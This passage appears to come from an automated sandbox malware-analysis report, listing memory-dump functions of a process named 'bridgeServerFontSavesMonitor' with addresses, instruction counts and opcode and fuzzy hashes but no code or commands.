                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e81b1bfcf7e478eb143973275a724013d5ea7a144c378852985ae683a01627d
                                                            • Instruction ID: e7bb64c530fc34bf9b66b5f7b3dd4997dd09b81b6ba2d3fa1d961cc03b9d322e
                                                            • Opcode Fuzzy Hash: 2e81b1bfcf7e478eb143973275a724013d5ea7a144c378852985ae683a01627d
                                                            • Instruction Fuzzy Hash: E732C631B1DA4E4BE768EB5884A16B973A2FFA8310F0546B9D05EC31E7DE34BD818741
                                                            Function 00007FFD9BAD0DC7 Relevance: .6, Instructions: 561COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c7038266e4d8dd090944d9964a832c3ef78c28c17f7a8cacb349f6f0e95793f
                                                            • Instruction ID: de3c401ad67fb28885a94421b8549c89558ec3b0c5bfa39d4f7ac205e7824e2b
                                                            • Opcode Fuzzy Hash: 0c7038266e4d8dd090944d9964a832c3ef78c28c17f7a8cacb349f6f0e95793f
                                                            • Instruction Fuzzy Hash: 4802C231F1990E4FE768EB5884A5B7973A2EFA8310F050679D05EC72E6DE74BD428740
                                                            Function 00007FFD9BAD0FA9 Relevance: .5, Instructions: 485COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 986eb8eb2a9a1107e08e86afcd2e18d4da059628c3b85e5ffc5e34e7b9c587a3
                                                            • Instruction ID: 1da18a21e91515a9e4a18135abce77df2806b6fefa97e7c085e0f0d32a760c63
                                                            • Opcode Fuzzy Hash: 986eb8eb2a9a1107e08e86afcd2e18d4da059628c3b85e5ffc5e34e7b9c587a3
                                                            • Instruction Fuzzy Hash: 69F1C331F1990E4FEB68EB5884A567973A2FFA8310F0506B9D05EC72E6DE74BD428740
                                                            Function 00007FFD9BAF377D Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f69b717ab4569d532b187879e9f8e1e573aab18c978c99c018d4f3fe25c8a00f
                                                            • Instruction ID: 8833351ce4e6d2b30afbe48731314ef1fcd62e8f8338a237817051f7290d9fcd
                                                            • Opcode Fuzzy Hash: f69b717ab4569d532b187879e9f8e1e573aab18c978c99c018d4f3fe25c8a00f
                                                            • Instruction Fuzzy Hash: 4F910421B1DB4E0FEBACEB5884B66B977C2EF98360F444179E40EC72D7DD68A9454380
                                                            Function 00007FFD9BAE93D3 Relevance: .2, Instructions: 208COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28026de5bb953931f9b134d47ce84a6531ddbcf122b7c139be1ecd420cf0cfc4
                                                            • Instruction ID: 030eea0837faa2b2ae1c7c5eda9979e943a475e4d0dc0d796f35db5de932f8eb
                                                            • Opcode Fuzzy Hash: 28026de5bb953931f9b134d47ce84a6531ddbcf122b7c139be1ecd420cf0cfc4
                                                            • Instruction Fuzzy Hash: B261B270B19A0E4FEB58EB68C4A5ABD73A2FF98314F154579D00EC72D6CE38A9428741
                                                            Function 00007FFD9BAE946D Relevance: .2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82d74479bb7fd05cc28014085e4ae1e45197e3a293d622405fb4be06912fbcbd
                                                            • Instruction ID: b2adf24a7b137f6afc2ed46943685f8605328f31eb61d7fcde5ea5f30fd1e478
                                                            • Opcode Fuzzy Hash: 82d74479bb7fd05cc28014085e4ae1e45197e3a293d622405fb4be06912fbcbd
                                                            • Instruction Fuzzy Hash: CE417030B1990D4FDB58EB69C458AAD73E1FF98310F51027AD01EC76A6DB35A9418B90
                                                            Function 00007FFD9BAC0910 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 362e5bad4f5bc77f254ed8d69df3dd04aca8bee31f1b90d2921ea719da2030c2
                                                            • Instruction ID: 1a6fb479ca71fb11c2fc44d3b56297d55e1e6db1c8833555d7c1f0e106dee5b5
                                                            • Opcode Fuzzy Hash: 362e5bad4f5bc77f254ed8d69df3dd04aca8bee31f1b90d2921ea719da2030c2
                                                            • Instruction Fuzzy Hash: DC417912B0D55D0FE318FBBCA4A96F87780DF4833AB0406BBE44ECB1E7CD18A8418284
                                                            Function 00007FFD9BAFB58C Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 57fd52d39f163917d257c7a97fcc420c93128d376e66392ec36ac3b399e8b009
                                                            • Instruction ID: 7363023d4da9113fbb027391a4da94d89e4919fe51209e462644bdfe94349351
                                                            • Opcode Fuzzy Hash: 57fd52d39f163917d257c7a97fcc420c93128d376e66392ec36ac3b399e8b009
                                                            • Instruction Fuzzy Hash: 5D31F661B19E4E4FE7E8D79C94A66E47AE1EF5C360F4901B6E00DC31E2DD34AD014741
                                                            Function 00007FFD9BAC0960 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e18b250f51cc025b63f3585100e9e7e07cae30c880d5282f4a2ac15e66dbd3bf
                                                            • Instruction ID: 8a1c3738f699c46bf2cf805cd6729142315aa7bf1dd5a02f25d93df067b10bb3
                                                            • Opcode Fuzzy Hash: e18b250f51cc025b63f3585100e9e7e07cae30c880d5282f4a2ac15e66dbd3bf
                                                            • Instruction Fuzzy Hash: 3A310911B0D91D0FE768B7ACA46A6F963C1DF9833AB1545BAE40EC72EBDC18AC414285
                                                            Function 00007FFD9BAC0998 Relevance: .1, Instructions: 105COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9d77ef4bceaa71fdb3095e89d72be2fb1a160c88150e0c1ab6ad9819b728946
                                                            • Instruction ID: dfa98a6e6076edbc9574dc6b593cbc00864ec68fb6a1aa6d9ac435c47c12760b
                                                            • Opcode Fuzzy Hash: c9d77ef4bceaa71fdb3095e89d72be2fb1a160c88150e0c1ab6ad9819b728946
                                                            • Instruction Fuzzy Hash: E2210921B1D90D0FE798BB6C946A67A76C2EF9C321B0501B9E40EC33F7DD689C014345
                                                            Function 00007FFD9BAED5A9 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e9a94045bc2d77d894f9a8c00dfa9619b1da2513cd055d01cccb607ef53451a3
                                                            • Instruction ID: c278f9713b0905eabba25f7db91967094f250d78a0b74aa9caa71704a7e6baf5
                                                            • Opcode Fuzzy Hash: e9a94045bc2d77d894f9a8c00dfa9619b1da2513cd055d01cccb607ef53451a3
                                                            • Instruction Fuzzy Hash: 10215A61A4F3C90FD713A77848684A5BFB0DF17204B4A41FBC4C9CB1E3EA29594AC312
                                                            Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 282cae9a143f4622e0a540099dcf379b444d737811570b1761f24c71ae24ff60
                                                            • Instruction ID: 6232a6ee1ba154aa45c98d274a48c3799ed8f82e070dd118b993a15d4f5e3d64
                                                            • Opcode Fuzzy Hash: 282cae9a143f4622e0a540099dcf379b444d737811570b1761f24c71ae24ff60
                                                            • Instruction Fuzzy Hash: 49210736B0E29D8EE732B7A898210FC7B60EF52325F1546F7D0588B1D3D9782646C785
                                                            Function 00007FFD9BAF27C8 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6e2b8846c9c9692fe759a2757ac679c4ec4d77d75eb8dd09ff9850feab510fd
                                                            • Instruction ID: 6da28c7820938f3098fe11a071ab5865896450eeb6567ee5c5695b8d08f8b2bd
                                                            • Opcode Fuzzy Hash: b6e2b8846c9c9692fe759a2757ac679c4ec4d77d75eb8dd09ff9850feab510fd
                                                            • Instruction Fuzzy Hash: 1021A731F0DB5D4FEBA8DB98C4A56E87792EF58360F550179E40DD72D2CD686C818780
                                                            Function 00007FFD9BAF1F8F Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cad79af15adc241d54b52634ead2a2fa9c67bbb0770eb2aae80ff70459b8fe9b
                                                            • Instruction ID: c9b81c76ec41fdc27235f9e4d7b2937196cfde3ee7e9ec13c3d615b90891e3e8
                                                            • Opcode Fuzzy Hash: cad79af15adc241d54b52634ead2a2fa9c67bbb0770eb2aae80ff70459b8fe9b
                                                            • Instruction Fuzzy Hash: 6F118F2064F3C19FCB179B3488689957FA0AF53211B0E41EED4C5CF0B3DA6C494AC712
                                                            Function 00007FFD9BAC2075 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62247cb1923992ab7f3d26ff3fed4a09d206575a2d37f4b10ad2492eba0a89d6
                                                            • Instruction ID: 9add72f30b78143f4e56f4c93ebd0a5c042984612b0b1661b3d7f9b6b8e7518a
                                                            • Opcode Fuzzy Hash: 62247cb1923992ab7f3d26ff3fed4a09d206575a2d37f4b10ad2492eba0a89d6
                                                            • Instruction Fuzzy Hash: 74116330B19A1D4BEAB8FBA884646B87391FF54300F0240B5D04ED72A2DE686D418640
                                                            Function 00007FFD9BAC1FE8 Relevance: .1, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b77012e9039cef6cc03c662a162a4683eb87986ab557e6b1e9d2fcf242dcc9c8
                                                            • Instruction ID: e106ebd95293c1084b195be4d8ff97ed263f22c2324668b0df0935aa0d8c4429
                                                            • Opcode Fuzzy Hash: b77012e9039cef6cc03c662a162a4683eb87986ab557e6b1e9d2fcf242dcc9c8
                                                            • Instruction Fuzzy Hash: CF115121F1EA1E5BEBB4BB9884646F87291FF48710F1241B6D40ED32F2DE686E408684
                                                            Function 00007FFD9BAC449C Relevance: .1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 68b05e7f6dfe37178d2fff8b91e1964d6d7b8288da079181997ec1210a102b69
                                                            • Instruction ID: e36f71ed5b646ee0153efdea0a8fbeb3a395694a6b15ba56ab55c41c01deb6e2
                                                            • Opcode Fuzzy Hash: 68b05e7f6dfe37178d2fff8b91e1964d6d7b8288da079181997ec1210a102b69
                                                            • Instruction Fuzzy Hash: E711ED3090892C8FDBA8EB08C494BA973E1EB58311F2541A9D44ED3271CF74AE85CB45
                                                            Function 00007FFD9BAC5323 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b02f25d0f1bd62d8f118f5512d131a6e7f5df956964b40833f60d7102a1be
                                                            • Instruction ID: a1fcf0526f4a7f0b9b3f264133566e383ddf75fbb8755962c1c89f108d694b69
                                                            • Opcode Fuzzy Hash: 424b02f25d0f1bd62d8f118f5512d131a6e7f5df956964b40833f60d7102a1be
                                                            • Instruction Fuzzy Hash: 5D111E21F1A90E8FEFB4FBB8846967822C1EFA5711F4644B5E00EC72F2DDA8AD414704
                                                            Function 00007FFD9BAC0865 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 918b7d752593cc348d4f2274dc79c8c348aa27978c0e5d4f18cc1b2361844c09
                                                            • Instruction ID: bd2a8209fd0a6f1bd1eb819c90fc8457cc3c7fdd755ef7dcfd3a3d21039bdd36
                                                            • Opcode Fuzzy Hash: 918b7d752593cc348d4f2274dc79c8c348aa27978c0e5d4f18cc1b2361844c09
                                                            • Instruction Fuzzy Hash: 13119112A1F2954ED326B769AC714E83F209F4662D70A42F7E4888F0A3D9086885C3C5
                                                            Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fcd62f6f11a0a6ab4c4095631152eef0f0ee96801f84a7f55bd3d455801320ee
                                                            • Instruction ID: 181ba3e80f822051e41e61aa086348cbdbccc4fdd129154f0b15f4ce1913cd8a
                                                            • Opcode Fuzzy Hash: fcd62f6f11a0a6ab4c4095631152eef0f0ee96801f84a7f55bd3d455801320ee
                                                            • Instruction Fuzzy Hash: 0111A035B0E68D8EE722EBA888611AC7BB0EF52711F0646F7C484DB2A3D97816458784
                                                            Function 00007FFD9BAC108D Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2fd6eede389d4f4d7cce58adcda3433717d358f0200b5885d56bf4ff868ee74f
                                                            • Instruction ID: 0628a4dd02b75af632777129f7806c2d4ef4089eccecc8cf96ff6bbe1d08c0fb
                                                            • Opcode Fuzzy Hash: 2fd6eede389d4f4d7cce58adcda3433717d358f0200b5885d56bf4ff868ee74f
                                                            • Instruction Fuzzy Hash: 80012B11A4F6C51FD36957B05C719B13F91CF9722070A02FAE089CB1F3C84D59868351
                                                            Function 00007FFD9BAFDA48 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e75a1e787d24b12492ad230a6ffe32286ffc13ff442f4b2127e2c6c2f927c4bf
                                                            • Instruction ID: 4955302d82e03a28715bd233bbeccedd1f31a7b34bd4c2b3232c990c53d3007a
                                                            • Opcode Fuzzy Hash: e75a1e787d24b12492ad230a6ffe32286ffc13ff442f4b2127e2c6c2f927c4bf
                                                            • Instruction Fuzzy Hash: 6501D833F0D50D8BFB65DA48D8957FC7791EF84320F060131D40C931A5CE795A818784
                                                            Function 00007FFD9BAC0C40 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 338d9661ff98ccbdcd91a5cc0f3aa24b6feb60d480da7105c5f5b7677d4b2380
                                                            • Instruction ID: 4dd131d922a0bfd88c9283645fdd37735c172c7da46b9aca2b5d119a9795394f
                                                            • Opcode Fuzzy Hash: 338d9661ff98ccbdcd91a5cc0f3aa24b6feb60d480da7105c5f5b7677d4b2380
                                                            • Instruction Fuzzy Hash: 6811E135B0E28C8FE722EB6888601AC7FB0EF42710F0641F7C484DB2A3D97816458784
                                                            Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4da65f64b3356d4eb78f7591d594c7a2c079fffbd5f0592994f5c70b61c03e63
                                                            • Instruction ID: eea1433c87a86223e4f7b03d36a9088394e4bc7a66b5fc6d82956cf41bde16d3
                                                            • Opcode Fuzzy Hash: 4da65f64b3356d4eb78f7591d594c7a2c079fffbd5f0592994f5c70b61c03e63
                                                            • Instruction Fuzzy Hash: F8019235A0E38D9FD721EB64C8541AC7FB0EF42710F1641E7C454DB2A2D9785645C781
                                                            Function 00007FFD9BAFBE35 Relevance: .0, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 290f3c80127c7cc2430e4af4cd06c90d7abdb94c5e8b405640eb657c162891ae
                                                            • Instruction ID: 1561fda421518f14444cc699232312c64dd7cd3a03004a6afb07f385df3d4d4f
                                                            • Opcode Fuzzy Hash: 290f3c80127c7cc2430e4af4cd06c90d7abdb94c5e8b405640eb657c162891ae
                                                            • Instruction Fuzzy Hash: 7AF02B1671D2540AC72AB32C68754F43F50CF5623A74900F7D0898B0A3D809944AC346
                                                            Function 00007FFD9BAC20A4 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: d4c866395610b74a6bdac5e08dc07abedeceb36ef09fec38e1956859ab19e0da
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 94F03634E1991E8BEBB4BB94C8646F87360FB54311F1241B9C04ED31A1DE786E85CB40
                                                            Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd7228c2e0dc7d138fb6cd84e76f5bc923fd98fef48044c16cc6099601ab8e3d
                                                            • Instruction ID: 38581a06bfb37fd1ca0f51b795b757ab76c544d00a3b241d129794e582e9da25
                                                            • Opcode Fuzzy Hash: fd7228c2e0dc7d138fb6cd84e76f5bc923fd98fef48044c16cc6099601ab8e3d
                                                            • Instruction Fuzzy Hash: 67017C34A0E38D9FE721EBA488641AC7FB0AF02714F1541E7C494DB2A3D9785A448745
                                                            Function 00007FFD9BAF32E9 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bec4dec0457c8491c487f5038d8b3708cc5444978cc73e1aca17b31379f8aa83
                                                            • Instruction ID: 3d7ef19ad59b4ab7263202b440cae82a53d8b1e191f70fca0880308d689c3af0
                                                            • Opcode Fuzzy Hash: bec4dec0457c8491c487f5038d8b3708cc5444978cc73e1aca17b31379f8aa83
                                                            • Instruction Fuzzy Hash: 6BE0122060EBC84FC70E963948695507FB1EB6B11178A52DBC445CB2F3D919DD89C752
                                                            Function 00007FFD9BAED029 Relevance: .0, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c8c43ae8548a6c8baf8326c278fbc20efb516a3154ad84e821ecf5d8c31b4677
                                                            • Instruction ID: 707e91758471bbe3ea6e68ad489dd34d96fcd526dcf3b7d64acd146258b62881
                                                            • Opcode Fuzzy Hash: c8c43ae8548a6c8baf8326c278fbc20efb516a3154ad84e821ecf5d8c31b4677
                                                            • Instruction Fuzzy Hash: 91F06D6151E3C40FC3129B3888654547FB0EA2B20534B05FBC0CACB5B3D91A888B8302
                                                            Function 00007FFD9BAD4792 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction ID: e805c711bc528ae03d3625db703375292f0be2a9ee213c4554534b6a955966ce
                                                            • Opcode Fuzzy Hash: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction Fuzzy Hash: ACF03025B0D41F4BE769EB8494A06B932D5FB94300F15427ED41BD31F6ED68A9128640
                                                            Function 00007FFD9BAC1AD2 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
